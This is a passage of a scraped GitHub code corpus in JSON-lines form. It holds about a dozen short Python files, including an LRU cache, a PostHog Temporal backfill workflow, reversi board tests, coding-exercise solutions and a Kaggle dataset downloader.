img_id","repo_name":"JungminChung/fasterRCNN","sub_path":"datasets/coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18972818868","text":"#!/usr/bin/env python3\n\"\"\"A class Least Recently Used Cache that inherits from\nBaseCaching and is a caching system:\n\"\"\"\n\n\nBaseCaching = __import__('base_caching').BaseCaching\n\n\nclass LRUCache(BaseCaching):\n \"\"\" Represents an object that allows storing and\n retrieving items from a dictionary with a LRU\n removal mechanism when the limit is reached.\n \"\"\"\n\n def __init__(self):\n \"\"\"initialize the object's attributes\n \"\"\"\n super().__init__()\n self.usedKeys = []\n\n def put(self, key, item):\n \"\"\"to add or update an item in the cache\n based on the provided key\n\n Args:\n key (_type_): _description_\n item (_type_): _description_\n \"\"\"\n if key is not None and item is not None:\n self.cache_data[key] = item\n if key not in self.usedKeys:\n self.usedKeys.append(key)\n else:\n self.usedKeys.append(\n self.usedKeys.pop(self.usedKeys.index(key)))\n if len(self.usedKeys) > BaseCaching.MAX_ITEMS:\n discard = self.usedKeys.pop(0)\n del self.cache_data[discard]\n print('DISCARD: {:s}'.format(discard))\n\n def get(self, key):\n \"\"\"returnss the value in self.cache_data linked to key\n\n Args:\n key (_type_): _description_\n \"\"\"\n if key is not None and key in self.cache_data.keys():\n self.usedKeys.append(self.usedKeys.pop(self.usedKeys.index(key)))\n return self.cache_data.get(key)\n return None\n","repo_name":"EYATUPE/alx-backend","sub_path":"0x01-caching/3-lru_cache.py","file_name":"3-lru_cache.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35603262294","text":"from funcoesTermosol import *\nfrom calculo_matrizes import *\nfrom solucoes import *\n\nimport numpy as np\n\n[nn,N,nm,Inc,nc,F,nr,R] = importa('validacao.xls')\n\nKG = calcula_KG(Inc, N)\n\nR = R.flatten().astype(int)\n\nKG_com_restricoes, F_com_restricoes = reduz_matrizes(KG, F, R)\n\ndeslocamentos = sistema_de_equacoes(KG_com_restricoes, F_com_restricoes, nn, R)\n\nreacoes_de_apoio = reacao_de_apoio(deslocamentos, KG, R)\n\nlista_deformacoes, lista_tensoes, lista_forcas_internas = deformacao_tensao_forca_interna(Inc, N, deslocamentos)\n\ngeraSaida(\"saida.txt\", reacoes_de_apoio, deslocamentos, lista_deformacoes, lista_forcas_internas, lista_tensoes)\n\nplota(N, Inc)\n\nN_novo = np.array(N)\nfor i in range(len(N_novo[0])):\n N_novo[0, i] += deslocamentos[i*2]\n N_novo[1, i] += deslocamentos[i*2+1]\n\nplota(N_novo, Inc)","repo_name":"rodme02/APS4_BigMath","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352559537","text":"# -*- coding: utf-8 -*-\n\n\"\"\"题目描述\n\n输入两棵二叉树A,B,判断B是不是A的子结构。(ps:我们约定空树不是任意一个树的子结构)\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x, left=None, right=None):\n self.val = x\n self.left = left\n self.right = right\n\ndef get_pre(pRoot, lst):\n if pRoot:\n lst.append(str(pRoot.val))\n get_pre(pRoot.left, lst)\n get_pre(pRoot.right, lst)\n else:\n lst.append(str('$'))\n\ndef get_in(pRoot, lst):\n if pRoot:\n get_in(pRoot.left, lst)\n lst.append(str(pRoot.val))\n get_in(pRoot.right, lst)\n else:\n lst.append(str('$'))\n\ndef in_array( src, tgt): \n n = len(src)\n i, j = 0, 0\n flag = False\n while j < len(tgt):\n if i == n:\n if flag:\n return True\n return False\n if not flag and tgt[j] == src[i]:\n flag = True\n i += 1\n j += 1\n continue\n if flag and tgt[j] != src[i]:\n i = 0\n j -= 1\n flag = False\n if flag:\n i += 1\n j+=1\n\n return False\n\ndef hasSubtree(pRoot1, pRoot2):\n if not pRoot2 or not pRoot1:\n return False\n pre1, pre2 = [], []\n in1, in2 = [], []\n get_pre(pRoot1, pre1)\n get_pre(pRoot2, pre2)\n #print(pre1, pre2)\n # check \n if in_array(pre2, pre1):\n get_in(pRoot1, in1)\n get_in(pRoot2, in2)\n return in_array(in2, in1)\n return False\n\nif __name__ == '__main__':\n #print(in_array([4, 1, 2], [4, 4, 1, 2, 3, 5]))\n root1 = TreeNode(8, TreeNode(8, TreeNode(9), TreeNode(2)), TreeNode(7, TreeNode(1), TreeNode(1)))\n root2 = TreeNode(8, TreeNode(9), TreeNode(2))\n print(hasSubtree(root1, root2))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"4671818429","text":"import random\n\npossible_dices = (\n \"D100\",\n \"D20\",\n \"D12\",\n \"D10\",\n \"D8\",\n \"D6\",\n \"D4\",\n \"D3\"\n)\n\ndef dice_code():\n \"\"\"\n Simulate dice throws\n :return: Integer; dice throws result\n \"\"\"\n user_input = input(\"Insert dice:\")\n for dice in possible_dices:\n if dice in user_input:\n try:\n throws_number, optional = user_input.split(dice)\n optional = int(optional) if optional else 0\n throws_number = int(throws_number) if throws_number else 1\n dice_number = int(dice[1:])\n throws_result = [random.randint(1, dice_number) for _ in range(throws_number)]\n return sum(throws_result) + optional\n except ValueError:\n return \"Wrong input\"\n break\n else:\n return \"Wrong Input\"\n\nprint(dice_code())","repo_name":"KrzysztofCalus/Workshop_dice","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4680369940","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport logging\nimport time\nimport os\n\nNODE_NAME = 'ela'\nELASTOS_PATH = ['src', 'github.com', 'elastos']\nELA_PATH = ELASTOS_PATH + ['Elastos.ELA']\nSPV_PATH = ELASTOS_PATH + ['Elastos.ELA.SPV']\nSPV_NODE_PATH = ELASTOS_PATH + ['Elastos.ELA.SPV.Node']\nSIDECHAIN_PATH = ELASTOS_PATH + ['Elastos.ELA.SideChain']\nARBITER_PATH = ELASTOS_PATH + ['Elastos.ELA.Arbiter']\n\nSPV_NODE_NAME = 'service'\nSPV_CONFIGURATION_FILE = 'config.json'\nTEST_PATH = './test'\n\nDEFAULT_CONFIG_FILE = {\n 'Configuration': {\n 'Magic': 1234567,\n 'Version': 23,\n 'SeedList': [],\n 'HttpInfoPort': 10333,\n 'HttpInfoStart': True,\n 'HttpRestPort': 10334,\n 'HttpWsPort': 10335,\n 'WsHeartbeatInterval': 60,\n 'HttpJsonPort': 10336,\n 'NodePort': 10338,\n 'NodeOpenPort': 10866,\n 'OpenService': False,\n 'PrintLevel': 0,\n 'IsTLS': False,\n 'MultiCoreNum': 4,\n 'MaxTransactionInBlock': 10000,\n 'MaxBlockSize': 8000000,\n 'PowConfiguration': {\n 'PayToAddr': '8VYXVxKKSAxkmRrfmGpQR2Kc66XhG6m3ta',\n 'AutoMining': False,\n 'MinerInfo': 'ELA',\n 'MinTxFee': 100,\n 'ActiveNet': 'RegNet'\n }\n }\n}\n\nLOAD_TIME = time.strftime(\"%b-%d-%Y-%H:%M:%S\")\nlogger = logging.getLogger('TestFramework')\nlogger.setLevel(logging.DEBUG)\nconsole_handler = logging.StreamHandler()\nif not os.path.exists('./logs'):\n os.makedirs('./logs')\nfile_handler = logging.FileHandler('logs/' + LOAD_TIME + '.log')\nformatter = logging.Formatter('%(asctime)s [line:%(lineno)d]'\n '%(levelname)s %(message)s')\nconsole_handler.setFormatter(formatter)\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\nlogger.addHandler(console_handler)\n","repo_name":"hejianhui/Elastos.ELA.PythonAutoTest","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39513532369","text":"import asyncio\nimport collections.abc\nimport dataclasses\nimport datetime as dt\nimport json\nimport typing\n\nimport temporalio\nimport temporalio.activity\nimport temporalio.client\nimport temporalio.common\nimport temporalio.exceptions\nimport temporalio.workflow\nfrom django.conf import settings\n\nfrom posthog.batch_exports.service import BackfillBatchExportInputs\nfrom posthog.temporal.batch_exports.base import PostHogWorkflow\nfrom posthog.temporal.batch_exports.batch_exports import (\n CreateBatchExportBackfillInputs,\n UpdateBatchExportBackfillStatusInputs,\n create_batch_export_backfill_model,\n update_batch_export_backfill_model_status,\n)\nfrom posthog.temporal.common.client import connect\n\n\nclass TemporalScheduleNotFoundError(Exception):\n \"\"\"Exception raised when a Temporal Schedule is not found.\"\"\"\n\n def __init__(self, schedule_id: str):\n super().__init__(f\"The Temporal Schedule {schedule_id} was not found (maybe it was deleted?)\")\n\n\nclass HeartbeatDetails(typing.NamedTuple):\n \"\"\"Details sent over in a Temporal Activity heartbeat.\"\"\"\n\n schedule_id: str\n start_at: str\n end_at: str\n wait_start_at: str\n\n def make_activity_heartbeat_while_running(\n self, function_to_run: collections.abc.Callable, heartbeat_every: dt.timedelta\n ) -> collections.abc.Callable[..., collections.abc.Coroutine]:\n \"\"\"Return a callable that returns a coroutine that heartbeats with these HeartbeatDetails.\n\n The returned callable wraps 'function_to_run' while heartbeating every 'heartbeat_every'\n seconds.\n \"\"\"\n\n async def heartbeat() -> None:\n \"\"\"Heartbeat every 'heartbeat_every' seconds.\"\"\"\n while True:\n await asyncio.sleep(heartbeat_every.total_seconds())\n temporalio.activity.heartbeat(self)\n\n async def heartbeat_while_running(*args, **kwargs):\n \"\"\"Wrap 'function_to_run' to asynchronously heartbeat while awaiting.\"\"\"\n heartbeat_task = asyncio.create_task(heartbeat())\n\n try:\n return await function_to_run(*args, **kwargs)\n finally:\n heartbeat_task.cancel()\n await asyncio.wait([heartbeat_task])\n\n return heartbeat_while_running\n\n\n@temporalio.activity.defn\nasync def get_schedule_frequency(schedule_id: str) -> float:\n \"\"\"Return a Temporal Schedule's frequency.\n\n This assumes that the Schedule has one interval set.\n\n Raises:\n TemporalScheduleNotFoundError: If the Temporal Schedule whose frequency we are trying to get doesn't exist.\n \"\"\"\n client = await connect(\n settings.TEMPORAL_HOST,\n settings.TEMPORAL_PORT,\n settings.TEMPORAL_NAMESPACE,\n settings.TEMPORAL_CLIENT_ROOT_CA,\n settings.TEMPORAL_CLIENT_CERT,\n settings.TEMPORAL_CLIENT_KEY,\n )\n\n handle = client.get_schedule_handle(schedule_id)\n\n try:\n desc = await handle.describe()\n except temporalio.service.RPCError as e:\n if e.status == temporalio.service.RPCStatusCode.NOT_FOUND:\n raise TemporalScheduleNotFoundError(schedule_id)\n else:\n raise\n\n interval = desc.schedule.spec.intervals[0]\n return interval.every.total_seconds()\n\n\n@dataclasses.dataclass\nclass BackfillScheduleInputs:\n \"\"\"Inputs for the backfill_schedule Activity.\"\"\"\n\n schedule_id: str\n start_at: str\n end_at: str\n frequency_seconds: float\n buffer_limit: int = 1\n wait_delay: float = 5.0\n\n\n@temporalio.activity.defn\nasync def backfill_schedule(inputs: BackfillScheduleInputs) -> None:\n \"\"\"Temporal Activity to backfill a Temporal Schedule.\n\n The backfill is broken up into batches of inputs.buffer_limit size. After a backfill batch is\n requested, we wait for it to be done before continuing with the next.\n\n This activity heartbeats while waiting to allow cancelling an ongoing backfill.\n \"\"\"\n start_at = dt.datetime.fromisoformat(inputs.start_at)\n end_at = dt.datetime.fromisoformat(inputs.end_at)\n\n client = await connect(\n settings.TEMPORAL_HOST,\n settings.TEMPORAL_PORT,\n settings.TEMPORAL_NAMESPACE,\n settings.TEMPORAL_CLIENT_ROOT_CA,\n settings.TEMPORAL_CLIENT_CERT,\n settings.TEMPORAL_CLIENT_KEY,\n )\n\n heartbeat_timeout = temporalio.activity.info().heartbeat_timeout\n\n details = temporalio.activity.info().heartbeat_details\n\n if details:\n # If we receive details from a previous run, it means we were restarted for some reason.\n # Let's not double-backfill and instead wait for any outstanding runs.\n last_activity_details = HeartbeatDetails(*details[0])\n\n details = HeartbeatDetails(\n schedule_id=inputs.schedule_id,\n start_at=last_activity_details.start_at,\n end_at=last_activity_details.end_at,\n wait_start_at=last_activity_details.wait_start_at,\n )\n\n await wait_for_schedule_backfill_in_range_with_heartbeat(details, client, heartbeat_timeout, inputs.wait_delay)\n\n # Update start_at to resume from the end of the period we just waited for\n start_at = dt.datetime.fromisoformat(last_activity_details.end_at)\n\n handle = client.get_schedule_handle(inputs.schedule_id)\n\n description = await handle.describe()\n jitter = description.schedule.spec.jitter\n\n frequency = dt.timedelta(seconds=inputs.frequency_seconds)\n full_backfill_range = backfill_range(start_at, end_at, frequency * inputs.buffer_limit)\n\n for backfill_start_at, backfill_end_at in full_backfill_range:\n utcnow = dt.datetime.now(dt.timezone.utc)\n\n if jitter is not None:\n backfill_end_at = backfill_end_at + jitter\n\n backfill = temporalio.client.ScheduleBackfill(\n start_at=backfill_start_at,\n end_at=backfill_end_at,\n overlap=temporalio.client.ScheduleOverlapPolicy.ALLOW_ALL,\n )\n await handle.backfill(backfill)\n\n details = HeartbeatDetails(\n schedule_id=inputs.schedule_id,\n start_at=backfill_start_at.isoformat(),\n end_at=backfill_end_at.isoformat(),\n wait_start_at=utcnow.isoformat(),\n )\n\n await wait_for_schedule_backfill_in_range_with_heartbeat(details, client, heartbeat_timeout, inputs.wait_delay)\n\n\nasync def wait_for_schedule_backfill_in_range_with_heartbeat(\n heartbeat_details: HeartbeatDetails,\n client: temporalio.client.Client,\n heartbeat_timeout: dt.timedelta | None = None,\n wait_delay: float = 5.0,\n):\n \"\"\"Decide if heartbeating is required while waiting for a backfill in range to finish.\"\"\"\n if heartbeat_timeout:\n wait_func = heartbeat_details.make_activity_heartbeat_while_running(\n wait_for_schedule_backfill_in_range, heartbeat_every=dt.timedelta(seconds=1)\n )\n else:\n wait_func = wait_for_schedule_backfill_in_range\n\n await wait_func(\n client,\n heartbeat_details.schedule_id,\n dt.datetime.fromisoformat(heartbeat_details.start_at),\n dt.datetime.fromisoformat(heartbeat_details.end_at),\n dt.datetime.fromisoformat(heartbeat_details.wait_start_at),\n wait_delay,\n )\n\n\nasync def wait_for_schedule_backfill_in_range(\n client: temporalio.client.Client,\n schedule_id: str,\n start_at: dt.datetime,\n end_at: dt.datetime,\n now: dt.datetime,\n wait_delay: float = 5.0,\n) -> None:\n \"\"\"Wait for a Temporal Schedule backfill in a date range to be finished.\n\n We can use the TemporalScheduledById and the TemporalScheduledStartTime to identify the Workflow executions\n runs that fall under this Temporal Schedule's backfill. However, there could be regularly scheduled runs returned\n by a query on just these two fields. So, we take the 'now' argument to provide a lower bound for the Workflow\n execution start time, assuming that backfill runs will have started recently after 'now' whereas regularly\n scheduled runs happened sometime in the past, before 'now'. This should hold true for historical backfills,\n but the heuristic fails for \"future backfills\", which should not be allowed.\n\n Raises:\n TemporalScheduleNotFoundError: If we detect the Temporal Schedule we are waiting on doesn't exist.\n \"\"\"\n if await check_temporal_schedule_exists(client, schedule_id) is False:\n raise TemporalScheduleNotFoundError(schedule_id)\n\n query = (\n f'TemporalScheduledById=\"{schedule_id}\" '\n f'AND TemporalScheduledStartTime >= \"{start_at.isoformat()}\" '\n f'AND TemporalScheduledStartTime <= \"{end_at.isoformat()}\" '\n f'AND StartTime >= \"{now.isoformat()}\"'\n )\n\n workflows = [workflow async for workflow in client.list_workflows(query=query)]\n\n if workflows and check_workflow_executions_not_running(workflows) is True:\n return\n\n done = False\n while not done:\n await asyncio.sleep(wait_delay)\n\n if await check_temporal_schedule_exists(client, schedule_id) is False:\n raise TemporalScheduleNotFoundError(schedule_id)\n\n workflows = [workflow async for workflow in client.list_workflows(query=query)]\n\n if not workflows:\n # Backfill hasn't started yet.\n continue\n\n if check_workflow_executions_not_running(workflows) is False:\n continue\n\n done = True\n\n\ndef check_workflow_executions_not_running(workflow_executions: list[temporalio.client.WorkflowExecution]) -> bool:\n \"\"\"Check if a list of Worflow Executions has any still running.\"\"\"\n return all(\n workflow_execution.status != temporalio.client.WorkflowExecutionStatus.RUNNING\n for workflow_execution in workflow_executions\n )\n\n\nasync def check_temporal_schedule_exists(client: temporalio.client.Client, schedule_id: str) -> bool:\n \"\"\"Check if Temporal Schedule exists by trying to describe it.\"\"\"\n handle = client.get_schedule_handle(schedule_id)\n\n try:\n await handle.describe()\n except temporalio.service.RPCError as e:\n if e.status == temporalio.service.RPCStatusCode.NOT_FOUND:\n return False\n else:\n raise\n return True\n\n\ndef backfill_range(\n start_at: dt.datetime, end_at: dt.datetime, step: dt.timedelta\n) -> typing.Generator[tuple[dt.datetime, dt.datetime], None, None]:\n \"\"\"Generate range of dates between start_at and end_at.\"\"\"\n current = start_at\n\n while current < end_at:\n current_end = current + step\n\n if current_end > end_at:\n # Do not yield a range that is less than step.\n # Same as built-in range.\n break\n\n yield current, current_end\n\n current = current_end\n\n\n@temporalio.workflow.defn(name=\"backfill-batch-export\")\nclass BackfillBatchExportWorkflow(PostHogWorkflow):\n \"\"\"A Temporal Workflow to manage a backfill of a batch export.\n\n Temporal Schedule backfills are limited in the number of batch periods we can buffer. This limit\n has been confirmed to be less than 1000. So, when triggering a backfill of more than 1000 batch\n periods (about a month for hourly batch exports), we need this Workflow to manage its progress.\n\n We also report on the progress by updating the BatchExportBackfill model.\n \"\"\"\n\n @staticmethod\n def parse_inputs(inputs: list[str]) -> BackfillBatchExportInputs:\n \"\"\"Parse inputs from the management command CLI.\"\"\"\n loaded = json.loads(inputs[0])\n return BackfillBatchExportInputs(**loaded)\n\n @temporalio.workflow.run\n async def run(self, inputs: BackfillBatchExportInputs) -> None:\n \"\"\"Workflow implementation to backfill a BatchExport.\"\"\"\n create_batch_export_backfill_inputs = CreateBatchExportBackfillInputs(\n team_id=inputs.team_id,\n batch_export_id=inputs.batch_export_id,\n start_at=inputs.start_at,\n end_at=inputs.end_at,\n status=\"Running\",\n )\n\n backfill_id = await temporalio.workflow.execute_activity(\n create_batch_export_backfill_model,\n create_batch_export_backfill_inputs,\n start_to_close_timeout=dt.timedelta(minutes=5),\n retry_policy=temporalio.common.RetryPolicy(\n initial_interval=dt.timedelta(seconds=10),\n maximum_interval=dt.timedelta(seconds=60),\n maximum_attempts=0,\n non_retryable_error_types=[\"NotNullViolation\", \"IntegrityError\"],\n ),\n )\n update_inputs = UpdateBatchExportBackfillStatusInputs(id=backfill_id, status=\"Completed\")\n\n frequency_seconds = await temporalio.workflow.execute_activity(\n get_schedule_frequency,\n inputs.batch_export_id,\n start_to_close_timeout=dt.timedelta(minutes=1),\n retry_policy=temporalio.common.RetryPolicy(maximum_attempts=0),\n )\n\n backfill_duration = dt.datetime.fromisoformat(inputs.end_at) - dt.datetime.fromisoformat(inputs.start_at)\n number_of_expected_runs = backfill_duration / dt.timedelta(seconds=frequency_seconds)\n\n backfill_schedule_inputs = BackfillScheduleInputs(\n schedule_id=inputs.batch_export_id,\n start_at=inputs.start_at,\n end_at=inputs.end_at,\n frequency_seconds=frequency_seconds,\n buffer_limit=inputs.buffer_limit,\n wait_delay=inputs.wait_delay,\n )\n try:\n await temporalio.workflow.execute_activity(\n backfill_schedule,\n backfill_schedule_inputs,\n retry_policy=temporalio.common.RetryPolicy(\n initial_interval=dt.timedelta(seconds=10),\n maximum_interval=dt.timedelta(seconds=60),\n non_retryable_error_types=[\"TemporalScheduleNotFoundError\"],\n ),\n # Temporal requires that we set a timeout.\n # Allocate 5 minutes per expected number of runs to backfill as a timeout.\n # The 5 minutes are just an assumption and we may tweak this in the future\n start_to_close_timeout=dt.timedelta(minutes=5 * number_of_expected_runs),\n heartbeat_timeout=dt.timedelta(minutes=2),\n )\n\n except temporalio.exceptions.ActivityError as e:\n if isinstance(e.cause, temporalio.exceptions.CancelledError):\n update_inputs.status = \"Cancelled\"\n else:\n update_inputs.status = \"Failed\"\n\n raise\n\n except Exception:\n update_inputs.status = \"Failed\"\n raise\n\n finally:\n await temporalio.workflow.execute_activity(\n update_batch_export_backfill_model_status,\n update_inputs,\n start_to_close_timeout=dt.timedelta(minutes=5),\n retry_policy=temporalio.common.RetryPolicy(\n initial_interval=dt.timedelta(seconds=10),\n maximum_interval=dt.timedelta(seconds=60),\n maximum_attempts=0,\n non_retryable_error_types=[\"NotNullViolation\", \"IntegrityError\"],\n ),\n )\n","repo_name":"PostHog/posthog","sub_path":"posthog/temporal/batch_exports/backfill_batch_export.py","file_name":"backfill_batch_export.py","file_ext":"py","file_size_in_byte":15180,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"2927210967","text":"from tkinter import *\r\nimport calendar\r\n\r\ntext = calendar.calendar(2022)\r\n\r\nroot=Tk()\r\nroot.geometry(\"530x700\")\r\nroot.title(\"CALENDAR\")\r\nlabel1=Label(root, text=\"CALENDAR\", bg=\"cyan\", font=(\"times\",28,\"bold\"))\r\nlabel1.grid(row=1, column=1)\r\nroot.config(background=\"cyan\")\r\nl1=Label(root, text=text,font=\"consoles 10 bold\")\r\nl1.grid(row=2, column=1, padx=20)\r\nroot.mainloop()","repo_name":"Anas275/Game","sub_path":"Calander.py","file_name":"Calander.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33775934532","text":"# 5- in the previous dictonary add one more item for RCB.\n# you can choose any 3 opponents.\n\n\nIPL = {\n\"CSK\" :{\n \"team_full_name\":\"Chennai Super King\",\n \"captain\":\"Dhoni\",\n \"players_match1\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n \"players_match2\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n \"opponent_team_name\":[\"MI\",\"RCB\",\"GT\"],\n \"result\":[\"Won\",\"Loss\"] \n},\n\"RCB\":{\n \"team_full_name\":\"Royal Channels Banglore\",\n \"captain\":\"Virat\",\n \"players_match1\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n \"players_match2\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n \"opponent_team_name\":[\"MI\",\"CSK\",\"GT\"],\n \"result\":[\"Won\",\"Loss\"] \n}\n\n}","repo_name":"Nidhig631/Namaste-Python","sub_path":"Day3/ques_5.py","file_name":"ques_5.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17182298270","text":"class Solution:\n def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n ans =[0]*len(temperatures)\n stack = [0]\n for i in range(1, len(temperatures)):\n while stack and temperatures[stack[-1]]< temperatures[i]:\n n=stack.pop()\n ans[n] = i-n\n stack.append(i)\n return ans","repo_name":"addisumotora/competitive_programming","sub_path":"dialytemp.py","file_name":"dialytemp.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69823137449","text":"\"\"\"Tests for google3.experimental.users.benjaminmarks.reversi .\"\"\"\n\nimport unittest\n\nfrom board import Board\nfrom board import Square\n\n\nclass BoardTest(unittest.TestCase):\n new_4_board = [\n [2, 2, 2, 2],\n [2, 0, 1, 2],\n [2, 1, 0, 2],\n [2, 2, 2, 2]\n ]\n new_8_board = [\n [2, 2, 2, 2, 2, 2, 2, 2],\n [2, 2, 2, 2, 2, 2, 2, 2],\n [2, 2, 2, 2, 2, 2, 2, 2],\n [2, 2, 2, 0, 1, 2, 2, 2],\n [2, 2, 2, 1, 0, 2, 2, 2],\n [2, 2, 2, 2, 2, 2, 2, 2],\n [2, 2, 2, 2, 2, 2, 2, 2],\n [2, 2, 2, 2, 2, 2, 2, 2]\n ]\n\n def test_board_creation(self):\n board = Board.makeboard(4)\n if not board:\n self.fail('Board not made')\n\n def test_board_initial_setup_size4(self):\n board = Board.makeboard(4)\n self.assertEqual(board.board, self.new_4_board)\n self.assertEqual(board.get_size(), 4)\n\n def test_board_initial_setup_size8(self):\n board = Board.makeboard(8)\n self.assertEqual(board.board, self.new_8_board)\n\n def test_board_can_count_pieces(self):\n board = Board.makeboard(6)\n self.assertEqual(board.num_pieces(Square.white), 2)\n self.assertEqual(board.num_pieces(Square.black), 2)\n\n def test_board_valid_move(self):\n expected_board = [\n [2, 2, 2, 2],\n [2, 0, 0, 0],\n [2, 1, 0, 2],\n [2, 2, 2, 2]\n ]\n board = Board.makeboard(4)\n board.add_piece(1, 3, Square.white)\n self.assertEqual(board.board, expected_board)\n\n def test_board_count_moves(self):\n board = Board.makeboard(6)\n board.add_piece(1, 3, Square.white)\n self.assertEqual(board.get_num_moves(), 1)\n\n def test_board_illegal_move_out_of_range(self):\n board = Board.makeboard(4)\n board.add_piece(0, 6, Square.white)\n self.assertEqual(board.board, self.new_4_board)\n\n def test_board_illegal_move_no_points(self):\n board = Board.makeboard(8)\n board.add_piece(1, 1, Square.white)\n self.assertEqual(board.board, self.new_8_board)\n\n def test_board_illegal_move_wrong_team(self):\n board = Board.makeboard(4)\n board.add_piece(1, 0, Square.black)\n self.assertEqual(board.board, self.new_4_board)\n\n def test_board_game_over_white_win(self):\n board = Board.makeboard(4)\n moves = [[3, 1], [3, 2],\n [3, 3], [3, 0],\n [0, 2], [2, 3],\n [1, 3], [0, 3],\n [0, 1], [0, 0],\n [2, 0], [1, 0]]\n self.do_moves(moves, board)\n self.assertEqual(board.who_won(), Square.white)\n\n def test_board_game_over_black_win(self):\n board = Board.makeboard(4)\n moves = [[2, 0], [3, 2],\n [2, 3], [3, 0],\n [3, 1], [1, 0],\n [0, 2], [3, 3],\n [0, 1], [0, 0],\n [1, 3], [0, 3]]\n self.do_moves(moves, board)\n self.assertEqual(board.who_won(), Square.black)\n\n def test_board_game_over_tie(self):\n board = Board.makeboard(4)\n moves = [[1, 3], [2, 3],\n [3, 3], [0, 3],\n [0, 2], [0, 1],\n [0, 0], [3, 2],\n [2, 0], [3, 0],\n [3, 1], [1, 0]]\n self.do_moves(moves, board)\n self.assertEqual(board.who_won(), Square.blank)\n\n def test_board_game_over_black_eliminated(self):\n board = Board.makeboard(4)\n moves = [[1, 3], [2, 3],\n [3, 1], [2, 0],\n [3, 3], [0, 1],\n [3, 0]]\n self.do_moves(moves, board)\n board.add_piece(0, 0, Square.white)\n board.add_piece(0, 2, Square.black)\n board.add_piece(0, 3, Square.white)\n board.add_piece(1, 0, Square.white)\n self.assertEqual(board.who_won(), Square.white)\n self.assertEqual(board.num_pieces(Square.black), 0)\n self.assertEqual(board.get_squares_left(), 1)\n\n def test_board_player_no_move(self):\n moves = [[1, 3], [2, 3],\n [3, 3], [0, 3],\n [0, 1]]\n board = Board.makeboard(4)\n self.do_moves(moves, board)\n self.assertEqual(board.can_move(Square.black), False)\n self.assertEqual(board.get_turn(), Square.white)\n\n def test_board_game_over_no_moves(self):\n moves = [[1, 3], [2, 3],\n [3, 3], [0, 3],\n [0, 1]]\n board = Board.makeboard(4)\n self.do_moves(moves, board)\n board.add_piece(3, 0, Square.white)\n self.assertEqual(board.who_won(), Square.white)\n\n def test_remake_board(self):\n board = Board.makeboard(8)\n board2 = Board.makeboard(8)\n remadeboard = Board.from_json(board.to_json(), Square.white)\n self.assertEqual(remadeboard.board, board2.board)\n\n # Helper function, executes given moves on board\n # Note: assumes other player always has a valid move\n def do_moves(self, moves, board):\n cur_team = Square.white\n for move in moves:\n board.add_piece(move[0], move[1], cur_team)\n if cur_team == Square.white:\n cur_team = Square.black\n else:\n cur_team = Square.white\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Benjamin-Marks/reversi","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19066672904","text":"from abc import ABC\nfrom pathlib import Path\n\nfrom dataset_format_benchmark.datasets import BaseDataset\n\n\nclass KaggleDataset(BaseDataset, ABC):\n BYTES_PER_VALUE = None\n DATASET_NAME = None\n IMAGE_DIR_NAME = None\n IMAGE_HEIGHT = None\n IMAGE_WIDTH = None\n RESULT_FILE_NAME = None\n\n def __init__(self, root: Path, transform=None, target_transform=None):\n super().__init__(root, transform, target_transform)\n\n if self.IMAGE_DIR_NAME:\n self.image_dir_path = Path(self.dataset_root_path, self.IMAGE_DIR_NAME)\n else:\n self.image_dir_path = None\n\n if self.RESULT_FILE_NAME:\n self.result_file_path = Path(self.dataset_root_path, self.RESULT_FILE_NAME)\n else:\n self.result_file_path = None\n\n self.transform = transform\n self.target_transform = target_transform\n self.x = None\n self.y = None\n\n def _download(self, force: bool = False):\n import kaggle\n\n kaggle.api.authenticate()\n\n if isinstance(self.DATASET_NAME, list):\n for dataset_name in self.DATASET_NAME:\n kaggle.api.dataset_download_files(dataset_name, path=self.dataset_root_path, quiet=False, unzip=True,\n force=force)\n else:\n kaggle.api.dataset_download_files(self.DATASET_NAME, path=self.dataset_root_path, quiet=False, unzip=True,\n 